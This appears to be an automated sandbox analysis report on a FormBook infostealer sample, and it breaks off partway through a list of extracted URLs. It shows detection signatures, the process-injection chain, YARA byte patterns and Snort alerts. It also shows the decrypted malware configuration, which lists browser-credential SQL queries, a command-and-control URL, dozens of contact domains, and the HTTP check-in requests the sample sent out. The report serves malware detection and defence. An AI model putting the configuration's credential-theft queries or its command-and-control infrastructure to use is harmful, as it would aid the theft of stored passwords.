Loading ...

Play interactive tourEdit tour

Analysis Report Po-covid19 2372#w2..exe

Overview

General Information

Sample Name:Po-covid19 2372#w2..exe
Analysis ID:338985
MD5:bf53c9dc0d0f032033c318aceef906c6
SHA1:eeba1ef352c09979dfdfb4afdcdc5f41fe2a0119
SHA256:a1558391914f4235dfdcdddcdf0de915a800541a4271feb4aff34af82b83a935
Tags:COVID19exeFormbook

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected AntiVM_3
Yara detected FormBook
Injects a PE file into a foreign processes
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains strange resources
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Tries to load missing DLLs
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • Po-covid19 2372#w2..exe (PID: 5532 cmdline: 'C:\Users\user\Desktop\Po-covid19 2372#w2..exe' MD5: BF53C9DC0D0F032033C318ACEEF906C6)
    • Po-covid19 2372#w2..exe (PID: 5404 cmdline: {path} MD5: BF53C9DC0D0F032033C318ACEEF906C6)
      • explorer.exe (PID: 3388 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • msiexec.exe (PID: 6748 cmdline: C:\Windows\SysWOW64\msiexec.exe MD5: 12C17B5A5C2A7B97342C362CA467E9A2)
          • cmd.exe (PID: 7092 cmdline: /c del 'C:\Users\user\Desktop\Po-covid19 2372#w2..exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 7100 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"Config: ": ["CONFIG_PATTERNS 0x8bc3", "KEY1_OFFSET 0x1d7db", "CONFIG SIZE : 0xd9", "CONFIG OFFSET 0x1d8dd", "URL SIZE : 28", "searching string pattern", "strings_offset 0x1c383", "searching hashes pattern", "--------------------------------------------------", "Decrypted Function Hashes", "--------------------------------------------------", "0xfd2db44c", "0xf43668a6", "0x980476e5", "0x35a6d50c", "0xf89290dc", "0x94261f57", "0x7d54c891", "0x47cb721", "0xf72d70b3", "0x9f715022", "0xbf0a5e41", "0x2902d074", "0xf653b199", "0xc8c42cc6", "0x2e1b7599", "0x210d4d07", "0x6d2a7921", "0x8ea85a2f", "0x207c50ff", "0xb967410a", "0x1eb17415", "0xb46802f8", "0x11da8518", "0xf42ed5c", "0x2885a3d3", "0x445675fa", "0x5c289b4c", "0x40ede5aa", "0xf24946a2", "0x8559c3e2", "0xb9d34d23", "0xa14d0a19", "0x2d07bbe2", "0xbbd1d68c", "0xb28c29d4", "0x3911edeb", "0xefad046d", "0xa0605497", "0xf5529cbf", "0x5507576a", "0xfa2467c8", "0x5b6423bf", "0xe22409b9", "0xde1eba2", "0xae847e2", "0xa8cfcc9", "0x26fc2c69", "0x5d8a75ac", "0x22eb3474", "0x2b37c918", "0x79402007", "0x7544791c", "0x641b2c94", "0x1db04ecf", "0xf5d02cd8", "0xad0121d2", "0x6206e716", "0x5e4b9b9a", "0xe4e2f5f4", "0x54c93159", "0x25ea79b", "0x5bf29119", "0xd6507db", "0x32ffc9f8", "0xe4cfab72", "0x98db5380", "0xce4cc542", "0x3092a0a2", "0x66053660", "0x2607a133", "0xfcd01541", "0x80b41d4", "0x4102ad8d", "0x857bf6a6", "0xd3ec6064", "0x23145fc4", "0xc026698f", "0x8f5385d8", "0x2430512b", "0x3ebe9086", "0x4c6fddb5", "0x276db13e", "0xe00f0a8e", "0x85cf9404", "0xb2248784", "0xcdc7e023", "0x11f5f50", "0x1dd4bc1c", "0x8235fce2", "0x21b17672", "0xbba64d93", "0x2f0ee0d8", "0x9cb95240", "0x28c21e3f", "0x9347ac57", "0x9d9522dc", "0x911bc70e", "0x74443db9", "0xf04c1aa9", "0x6484bcb5", "0x11fc2f72", "0x2b44324f", "0x9d70beea", "0x59adf952", "0x172ac7b4", "0x5d4b4e66", "0xed297eae", "0xa88492a6", "0xb21b057c", "0x70f35767", "0xb6f4d5a8", "0x67cea859", "0xc1626bff", "0xb4e1ae2", "0x24a48dcf", "0xe11da208", "0x1c920818", "0x65f4449c", "0xc30bc050", "0x3e86e1fb", "0x9e01fc32", "0x216500c2", "0x48e207c9", "0x2decf13e", "0x19996921", "0xb7da3dd7", "0x47f39d2b", "0x6777e2de", "0xd980e37f", "0x963fea3b", "0xacddb7ea", "0x110aec35", "0x647331f3", "0x2e381da4", "0x50f66474", "0xec16e0c0", "0xf9d81a42", "0xd6c6f9db", "0xef3df91", "0x60e0e203", "0x7c81caaf", "0x71c2ec76", "0x25e431cc", "0x106f568f", "0x6a60c8a9", "0xb758aab3", "0x3b34de90", "0x700420f5", "0xee359a7e", "0xd1d808a", "0x47ba47a5", "0xff959c4c", "0x5d30a87d", "0xaa95a900", "0x80b19064", "0x9c5a481a", "0x1dd252d", "0xdb3055fc", "0xe0cf8bf1", "0x3a48eabc", "0xf0472f97", "0x4a6323de", "0x4260edca", "0x53f7fb4f", "0x3d2e9c99", "0xf6879235", "0xe6723cac", "0xe184dfaa", "0xe99ffaa0", "0xf6aebe25", "0xefadf9a5", "0x215de938", "0x757906aa", "0x84f8d766", "0xb6494f65", "0x13a75318", "0x5bde5587", "0xe9eba2a4", "0x6b8a0df3", "0x9c02f250", "0xe52a2a2e", "0xdb96173c", "0x3c0f2fc", "0xd45e157c", "0x4edd1210", "0x2b127ce0", "0xadc887b6", "0xf45a1c52", "0xc84869d7", "0x36dc1f04", "0x50c2a508", "0x3e88e8bf", "0x4b6374a6", "0x72a93198", "0x85426977", "0xea193e11", "0xea653007", "0xe297c9c", "0x65399e87", "0x23609e75", "0xb92e8a5a", "0xabc89476", "0xd989572f", "0x4536ab86", "0x3476afc1", "0xaf24a63b", "0x393b9ac8", "0x414a3c70", "0x487e77f4", "0xbee1bdf6", "0xc30c49a6", "0xcb591d7f", "0x5c4ee455", "0x7c81c71d", "0x11c6f95e", "--------------------------------------------------", "Decrypted Strings", "--------------------------------------------------", "USERNAME", "LOCALAPPDATA", "USERPROFILE", "APPDATA", "TEMP", "ProgramFiles", "CommonProgramFiles", "ALLUSERSPROFILE", "/c copy \"", "/c del \"", "\\Run", "\\Policies", "\\Explorer", "\\Registry\\User", "\\Registry\\Machine", "\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion", "Office\\15.0\\Outlook\\Profiles\\Outlook\\", " NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\", "\\SOFTWARE\\Mozilla\\Mozilla ", "\\Mozilla", "Username: ", "Password: ", "formSubmitURL", "usernameField", "encryptedUsername", "encryptedPassword", "\\logins.json", "\\signons.sqlite", "\\Microsoft\\Vault\\", "SELECT encryptedUsername, encryptedPassword, formSubmitURL FROM moz_logins", "\\Google\\Chrome\\User Data\\Default\\Login Data", "SELECT origin_url, username_value, password_value FROM logins", ".exe", ".com", ".scr", ".pif", ".cmd", ".bat", "ms", "win", "gdi", "mfc", "vga", "igfx", "user", "help", "config", "update", "regsvc", "chkdsk", "systray", "audiodg", "certmgr", "autochk", "taskhost", "colorcpl", "services", "IconCache", "ThumbCache", "Cookies", "SeDebugPrivilege", "SeShutdownPrivilege", "\\BaseNamedObjects", "config.php", "POST ", " HTTP/1.1", "", "Host: ", "", "Connection: close", "", "Content-Length: ", "", "Cache-Control: no-cache", "", "Origin: http://", "", "User-Agent: Mozilla Firefox/4.0", "", "Content-Type: application/x-www-form-urlencoded", "", "Accept: */*", "", "Referer: http://", "", "Accept-Language: en-US", "", "Accept-Encoding: gzip, deflate", "", "dat=", "f-start", "kimberlyrutledge.com", "auctus.agency", "johnemotions.com", "guilt-brilliant.com", "wxshangdian.com", "theolivetreeonline.com", "stellarfranchisebrands.com", "every1no1.com", "hoangthanhgroup.com", "psm-gen.com", "kingdomwow.com", "digitalksr.com", "karynpolitoforlg.com", "youthdaycalgary.com", "libertyhandymanservicesllc.com", "breatheohio.com", "allenleather.com", "transformafter50.info", "hnhsylsb.com", "hmtradebd.com", "besrhodislandhomes.com", "zuwozo.com", "southernhighlandsnails.com", "kaaxg.com", "bauer-cobolt.com", "steelyourselfshop.net", "linksoflondoncharmscheap.com", "groundwork-pt.com", "beautifulangelicskin.com", "aduhelmfinancialsupport.com", "xn--carpinteratarifa-hsb.com", "thekingink.net", "ocotegrill.com", "gilbertdodge.com", "insuranceinquirer.com", "withagentcy.com", "deeparchivesvpn.com", "blamekd.com", "acsdealta.xyz", "dsxcj.com", "kimonoshihan.com", "bosquefamily.com", "5587sk.com", "integrative.life", "unitedjournal.info", "lynxdeck.com", "onlyfanyou.com", "aminomedicalscience.com", "rachenstern-technik.com", "thejewelrybox.net", "stopcolleges.com", "thesaltlifestyle.com", "tappesupportservices.com", "andrewgreenhomes.com", "meidiansc.com", "gobalexporter.com", "rvpji571m.xyz", "alwekalaaladabeya.com", "scientificimaginetics.com", "skaizenpharma.com", "balloonpost.club", "thefunnythingabout.com", "premium-vitality.com", "businesscalmcoaching.com", "f-end", "--------------------------------------------------", "Decrypted CnC URL", "--------------------------------------------------", "www.styrelseforum.com/p95n/\u0000"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000E.00000002.616475940.0000000000B40000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    0000000E.00000002.616475940.0000000000B40000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x1b507:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1c50a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    0000000E.00000002.616475940.0000000000B40000.00000040.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x18429:$sqlite3step: 68 34 1C 7B E1
    • 0x1853c:$sqlite3step: 68 34 1C 7B E1
    • 0x18458:$sqlite3text: 68 38 2A 90 C5
    • 0x1857d:$sqlite3text: 68 38 2A 90 C5
    • 0x1846b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x18593:$sqlite3blob: 68 53 D8 7F 8C
    00000003.00000002.297322370.0000000000FB0000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000003.00000002.297322370.0000000000FB0000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x1b507:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1c50a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 18 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      3.2.Po-covid19 2372#w2..exe.400000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        3.2.Po-covid19 2372#w2..exe.400000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x8ae8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x8d62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x14885:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x14371:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x14987:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x14aff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x977a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x135ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xa473:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x1a707:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1b70a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        3.2.Po-covid19 2372#w2..exe.400000.0.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x17629:$sqlite3step: 68 34 1C 7B E1
        • 0x1773c:$sqlite3step: 68 34 1C 7B E1
        • 0x17658:$sqlite3text: 68 38 2A 90 C5
        • 0x1777d:$sqlite3text: 68 38 2A 90 C5
        • 0x1766b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x17793:$sqlite3blob: 68 53 D8 7F 8C
        3.2.Po-covid19 2372#w2..exe.400000.0.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          3.2.Po-covid19 2372#w2..exe.400000.0.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x1b507:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1c50a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 1 entries

          Sigma Overview

          No Sigma rule has matched

          Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Antivirus / Scanner detection for submitted sampleShow sources
          Source: Po-covid19 2372#w2..exeAvira: detected
          Found malware configurationShow sources
          Source: 3.2.Po-covid19 2372#w2..exe.400000.0.unpackMalware Configuration Extractor: FormBook {"Config: ": ["CONFIG_PATTERNS 0x8bc3", "KEY1_OFFSET 0x1d7db", "CONFIG SIZE : 0xd9", "CONFIG OFFSET 0x1d8dd", "URL SIZE : 28", "searching string pattern", "strings_offset 0x1c383", "searching hashes pattern", "--------------------------------------------------", "Decrypted Function Hashes", "--------------------------------------------------", "0xfd2db44c", "0xf43668a6", "0x980476e5", "0x35a6d50c", "0xf89290dc", "0x94261f57", "0x7d54c891", "0x47cb721", "0xf72d70b3", "0x9f715022", "0xbf0a5e41", "0x2902d074", "0xf653b199", "0xc8c42cc6", "0x2e1b7599", "0x210d4d07", "0x6d2a7921", "0x8ea85a2f", "0x207c50ff", "0xb967410a", "0x1eb17415", "0xb46802f8", "0x11da8518", "0xf42ed5c", "0x2885a3d3", "0x445675fa", "0x5c289b4c", "0x40ede5aa", "0xf24946a2", "0x8559c3e2", "0xb9d34d23", "0xa14d0a19", "0x2d07bbe2", "0xbbd1d68c", "0xb28c29d4", "0x3911edeb", "0xefad046d", "0xa0605497", "0xf5529cbf", "0x5507576a", "0xfa2467c8", "0x5b6423bf", "0xe22409b9", "0xde1eba2", "0xae847e2", "0xa8cfcc9", "0x26fc2c69", "0x5d8a75ac", "0x22eb3474", "0x2b37c918", "0x79402007", "0x7544791c", "0x641b2c94", "0x1db04ecf", "0xf5d02cd8", "0xad0121d2", "0x6206e716", "0x5e4b9b9a", "0xe4e2f5f4", "0x54c93159", "0x25ea79b", "0x5bf29119", "0xd6507db", "0x32ffc9f8", "0xe4cfab72", "0x98db5380", "0xce4cc542", "0x3092a0a2", "0x66053660", "0x2607a133", "0xfcd01541", "0x80b41d4", "0x4102ad8d", "0x857bf6a6", "0xd3ec6064", "0x23145fc4", "0xc026698f", "0x8f5385d8", "0x2430512b", "0x3ebe9086", "0x4c6fddb5", "0x276db13e", "0xe00f0a8e", "0x85cf9404", "0xb2248784", "0xcdc7e023", "0x11f5f50", "0x1dd4bc1c", "0x8235fce2", "0x21b17672", "0xbba64d93", "0x2f0ee0d8", "0x9cb95240", "0x28c21e3f", "0x9347ac57", "0x9d9522dc", "0x911bc70e", "0x74443db9", "0xf04c1aa9", "0x6484bcb5", "0x11fc2f72", "0x2b44324f", "0x9d70beea", "0x59adf952", "0x172ac7b4", "0x5d4b4e66", "0xed297eae", "0xa88492a6", "0xb21b057c", "0x70f35767", "0xb6f4d5a8", "0x67cea859", "0xc1626bff", "0xb4e1ae2", "0x24a48dcf", "0xe11da208", "0x1c920818", "0x65f4449c", "0xc30bc050", "0x3e86e1fb", "0x9e01fc32", "0x216500c2", "0x48e207c9", "0x2decf13e", "0x19996921", "0xb7da3dd7", "0x47f39d2b", "0x6777e2de", "0xd980e37f", "0x963fea3b", "0xacddb7ea", "0x110aec35", "0x647331f3", "0x2e381da4", "0x50f66474", "0xec16e0c0", "0xf9d81a42", "0xd6c6f9db", "0xef3df91", "0x60e0e203", "0x7c81caaf", "0x71c2ec76", "0x25e431cc", "0x106f568f", "0x6a60c8a9", "0xb758aab3", "0x3b34de90", "0x700420f5", "0xee359a7e", "0xd1d808a", "0x47ba47a5", "0xff959c4c", "0x5d30a87d", "0xaa95a900", "0x80b19064", "0x9c5a481a", "0x1dd252d", "0xdb3055fc", "0xe0cf8bf1", "0x3a48eabc", "0xf0472f97", "0x4a6323de", "0x4260edca", "0x53f7fb4f", "0x3d2e9c99", "0xf6879235", "0xe6723cac", "0xe184dfaa", "0xe99ffaa0", "0xf6aebe25", "0xefadf9a5", "0x215de938", "0x757906aa", "0x84f8d766", "0xb6494f65", "0x13a75318", "0x5bde5587", "0xe9eba2a4", "0x6b8a0df3", "0x9c02f250", "0xe52a2a2e", "0xdb96173c", "0x3c0f2fc", "0xd45e157c", "0x4edd1210", "0x2b127ce0", "0xadc887b6", "0xf45a1c52", "0xc84869d7", "0x36dc1f04",
          Multi AV Scanner detection for submitted fileShow sources
          Source: Po-covid19 2372#w2..exeReversingLabs: Detection: 27%
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 0000000E.00000002.616475940.0000000000B40000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.297322370.0000000000FB0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000E.00000002.614725408.0000000000680000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000E.00000002.616862762.0000000000B70000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.296624622.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.298199420.00000000013B0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.256080598.000000000406F000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 3.2.Po-covid19 2372#w2..exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.Po-covid19 2372#w2..exe.400000.0.raw.unpack, type: UNPACKEDPE
          Machine Learning detection for sampleShow sources
          Source: Po-covid19 2372#w2..exeJoe Sandbox ML: detected
          Source: 3.2.Po-covid19 2372#w2..exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen

          Compliance:

          barindex
          Detected unpacking (overwrites its own PE header)Show sources
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeUnpacked PE file: 0.2.Po-covid19 2372#w2..exe.70000.0.unpack
          Source: Po-covid19 2372#w2..exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: Po-covid19 2372#w2..exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: msiexec.pdb source: Po-covid19 2372#w2..exe, 00000003.00000002.298579388.0000000001410000.00000040.00000001.sdmp
          Source: Binary string: msiexec.pdbGCTL source: Po-covid19 2372#w2..exe, 00000003.00000002.298579388.0000000001410000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: Po-covid19 2372#w2..exe, 00000003.00000002.299260110.000000000160F000.00000040.00000001.sdmp, msiexec.exe, 0000000E.00000002.618326850.0000000004560000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: Po-covid19 2372#w2..exe, msiexec.exe
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 4x nop then pop esi3_2_004172D9
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 4x nop then pop edi3_2_00417D8F
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then pop esi14_2_006972D9
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then pop edi14_2_00697D8F

          Networking:

          barindex
          Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49737 -> 165.160.13.20:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49737 -> 165.160.13.20:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49737 -> 165.160.13.20:80
          Source: global trafficHTTP traffic detected: GET /p95n/?u6ihA=cjlpdRL8ZtfDvB1&oH5h=BBaWJPlPEO+nvtMqhmqrcRgDtKq1LKrnuc6I0tDI+4mn5icveD46W7DXUUudv5GhOCct HTTP/1.1Host: www.thesaltlifestyle.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /p95n/?oH5h=yIt3vHGcFY19i9LszRbGqv8br4EBNSz7kQseU3pL44UQdgKo/VZu2mbLhFyK51ONzUns&u6ihA=cjlpdRL8ZtfDvB1 HTTP/1.1Host: www.aduhelmfinancialsupport.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /p95n/?u6ihA=cjlpdRL8ZtfDvB1&oH5h=gRhj5HMuZvR/Ec7o8oi+HxLziNFcY38IPUSKESyExHr5bx7zEB/jrV73UqEK091YdqI8 HTTP/1.1Host: www.scientificimaginetics.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /p95n/?oH5h=OkCbzDuuF1pG8/+FjCqUEbhCI/Ef9I/I5jzkOiKX/zkELnGsjuBbK/8sh3SawKW3Kze/&u6ihA=cjlpdRL8ZtfDvB1 HTTP/1.1Host: www.johnemotions.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 34.102.136.180 34.102.136.180
          Source: Joe Sandbox ViewASN Name: POWERLINE-AS-APPOWERLINEDATACENTERHK POWERLINE-AS-APPOWERLINEDATACENTERHK
          Source: Joe Sandbox ViewASN Name: GOOGLEUS GOOGLEUS
          Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
          Source: global trafficHTTP traffic detected: GET /p95n/?u6ihA=cjlpdRL8ZtfDvB1&oH5h=BBaWJPlPEO+nvtMqhmqrcRgDtKq1LKrnuc6I0tDI+4mn5icveD46W7DXUUudv5GhOCct HTTP/1.1Host: www.thesaltlifestyle.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /p95n/?oH5h=yIt3vHGcFY19i9LszRbGqv8br4EBNSz7kQseU3pL44UQdgKo/VZu2mbLhFyK51ONzUns&u6ihA=cjlpdRL8ZtfDvB1 HTTP/1.1Host: www.aduhelmfinancialsupport.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /p95n/?u6ihA=cjlpdRL8ZtfDvB1&oH5h=gRhj5HMuZvR/Ec7o8oi+HxLziNFcY38IPUSKESyExHr5bx7zEB/jrV73UqEK091YdqI8 HTTP/1.1Host: www.scientificimaginetics.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /p95n/?oH5h=OkCbzDuuF1pG8/+FjCqUEbhCI/Ef9I/I5jzkOiKX/zkELnGsjuBbK/8sh3SawKW3Kze/&u6ihA=cjlpdRL8ZtfDvB1 HTTP/1.1Host: www.johnemotions.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: unknownDNS traffic detected: queries for: www.thesaltlifestyle.com
          Source: explorer.exe, 00000004.00000000.281618251.000000000F5C4000.00000004.00000001.sdmpString found in binary or memory: http://crl.;
          Source: explorer.exe, 00000004.00000000.281664878.000000000F5E5000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
          Source: Po-covid19 2372#w2..exe, 00000000.00000002.262331435.0000000008B22000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.277115115.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
          Source: Po-covid19 2372#w2..exe, 00000000.00000002.262331435.0000000008B22000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.277115115.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
          Source: Po-covid19 2372#w2..exe, 00000000.00000002.262331435.0000000008B22000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.277115115.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
          Source: Po-covid19 2372#w2..exe, 00000000.00000003.225055826.000000000791B000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.277115115.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
          Source: Po-covid19 2372#w2..exe, 00000000.00000003.226795444.000000000791B000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com-
          Source: Po-covid19 2372#w2..exe, 00000000.00000003.227104715.000000000791B000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com.TTF
          Source: Po-covid19 2372#w2..exe, 00000000.00000003.225390108.000000000791B000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/
          Source: explorer.exe, 00000004.00000000.277115115.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
          Source: Po-covid19 2372#w2..exe, 00000000.00000003.225055826.000000000791B000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/
          Source: Po-covid19 2372#w2..exe, 00000000.00000002.262331435.0000000008B22000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.277115115.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
          Source: Po-covid19 2372#w2..exe, 00000000.00000003.226977608.0000000007942000.00000004.00000001.sdmp, Po-covid19 2372#w2..exe, 00000000.00000003.226763972.0000000007942000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.html
          Source: Po-covid19 2372#w2..exe, 00000000.00000002.262331435.0000000008B22000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.277115115.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
